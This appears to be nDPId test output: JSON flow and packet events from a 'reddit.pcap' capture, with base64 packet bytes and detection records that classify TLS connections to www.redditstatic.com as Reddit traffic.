+00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUsAAAAAoAL9IMleAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YysAAAAAoAL9ICkLAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVasAAAAAoAL9IGuvAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NYAAAAAoAL9IMKJAAACBAWgBAIICql05gAAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXMAAAAAoAL9IIyvAAACBAWgBAIICql05gAAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx4AAAAAoAL9IOUhAAACBAWgBAIICql05gAAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg34wAAAAAoAL9IKbfAAACBAWgBAIICql05gAAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2EAAAAAoAL9IFHtAAACBAWgBAIICql05gQAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiEAAAAAoAL9IB7eAAACBAWgBAIICql05gQAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXsAAAAAoAL9ID\/VAAACBAWgBAIICql05gQAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowUAAAAAoAL9IHbXAAACBAWgBAIICql05gQAAAAAAQMDBw=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JWtCtDxMC8voBJXgHBaAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8oSMMqHg8cyAoBJXgMyZAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy+VrQrRgBAB+\/RNAAABAQgKqXTmBcLXOKI="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzICEjDKigBAB+1CNAAABAQgKqXTmBcLXOKI="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+p6YTHT6uGMsoBJXgOg4AAACBAV4AQMDAwQCCArC1zipqXTl5w=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+BQBJhBwR01MoBJXgDmIAAACBAV4AQMDAwQCCArC1zipqXTl5w=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9o6MJX7sl7kLoBJXgNeBAAACBAV4AQMDAwQCCArC1zioqXTl5w=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YyyemEx1gBAB+2wmAAABAQgKqXTmC8LXOKk="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUwUASYRgBAB+711AAABAQgKqXTmC8LXOKk="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQuOjCV\/gBAB+1tvAAABAQgKqXTmC8LXOKg="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605291686072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686072,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/KfiS\/LFklWsoBJXgCIUAAACBAV4AQMDAwQCCArC1ziqqXTl5w=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605291686072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686072,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVayn4kvzgBAB+6YAAAABAQgKqXTmDMLXOKo="} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 